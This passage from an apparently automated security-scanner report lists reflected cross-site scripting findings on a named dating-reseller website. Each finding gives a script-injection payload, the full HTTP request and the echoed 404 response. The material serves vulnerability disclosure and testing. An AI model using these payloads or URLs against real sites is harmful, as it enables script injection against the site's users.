User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/?91945<script>alert(1)</script>4c9e5f211d9=1 was not found on this server.</p>
...[SNIP]...

2.212. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac0d9<script>alert(1)</script>47edd3b252f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultac0d9<script>alert(1)</script>47edd3b252f/personals-dating/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultac0d9<script>alert(1)</script>47edd3b252f/personals-dating/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.213. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af956<script>alert(1)</script>79f8718fc31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingaf956<script>alert(1)</script>79f8718fc31/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingaf956<script>alert(1)</script>79f8718fc31/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.214. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 505ac<script>alert(1)</script>0e4046e6f83 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes505ac<script>alert(1)</script>0e4046e6f83/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes505ac<script>alert(1)</script>0e4046e6f83/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.215. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5432c<script>alert(1)</script>06867c0e10f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos5432c<script>alert(1)</script>06867c0e10f/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos5432c<script>alert(1)</script>06867c0e10f/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.216. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ec621<script>alert(1)</script>a3e1a358374 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesec621<script>alert(1)</script>a3e1a358374/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesec621<script>alert(1)</script>a3e1a358374/folder.gif was not found on this server.</p>
...[SNIP]...

2.217. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8f501<script>alert(1)</script>9e3d09573d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/folder.gif8f501<script>alert(1)</script>9e3d09573d2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/folder.gif8f501<script>alert(1)</script>9e3d09573d2 was not found on this server.</p>
...[SNIP]...

2.218. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 51cde<script>alert(1)</script>6129bdc5840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/folder.gif?51cde<script>alert(1)</script>6129bdc5840=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/folder.gif?51cde<script>alert(1)</script>6129bdc5840=1 was not found on this server.</p>
...[SNIP]...

2.219. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3b71<script>alert(1)</script>230dbfe6196 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultf3b71<script>alert(1)</script>230dbfe6196/personals-dating/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultf3b71<script>alert(1)</script>230dbfe6196/personals-dating/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.220. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99b12<script>alert(1)</script>6b69acffc5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating99b12<script>alert(1)</script>6b69acffc5f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating99b12<script>alert(1)</script>6b69acffc5f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.221. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a4a8<script>alert(1)</script>fe61676dfc1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes9a4a8<script>alert(1)</script>fe61676dfc1/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes9a4a8<script>alert(1)</script>fe61676dfc1/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.222. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ab94f<script>alert(1)</script>4a72a456a6d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmosab94f<script>alert(1)</script>4a72a456a6d/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmosab94f<script>alert(1)</script>4a72a456a6d/images/rating/ was not found on this server.</p>
...[SNIP]...

2.223. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1df1<script>alert(1)</script>ade908387a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesb1df1<script>alert(1)</script>ade908387a6/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesb1df1<script>alert(1)</script>ade908387a6/rating/ was not found on this server.</p>
...[SNIP]...

2.224. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 38cca<script>alert(1)</script>aa377895800 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating38cca<script>alert(1)</script>aa377895800/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating38cca<script>alert(1)</script>aa377895800/ was not found on this server.</p>
...[SNIP]...

2.225. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 953e1<script>alert(1)</script>6eb6b61c945 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/?953e1<script>alert(1)</script>6eb6b61c945=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/?953e1<script>alert(1)</script>6eb6b61c945=1 was not found on this server.</p>
...[SNIP]...

2.226. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 161c0<script>alert(1)</script>763acf89bb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult161c0<script>alert(1)</script>763acf89bb2/personals-dating/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult161c0<script>alert(1)</script>763acf89bb2/personals-dating/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.227. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23d8e<script>alert(1)</script>9bace986d97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating23d8e<script>alert(1)</script>9bace986d97/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating23d8e<script>alert(1)</script>9bace986d97/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.228. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4fd57<script>alert(1)</script>d833e57e91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes4fd57<script>alert(1)</script>d833e57e91/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes4fd57<script>alert(1)</script>d833e57e91/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.229. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce57f<script>alert(1)</script>ea19126f4ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmosce57f<script>alert(1)</script>ea19126f4ea/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmosce57f<script>alert(1)</script>ea19126f4ea/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.230. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7edfb<script>alert(1)</script>d0a8f0849d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images7edfb<script>alert(1)</script>d0a8f0849d1/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
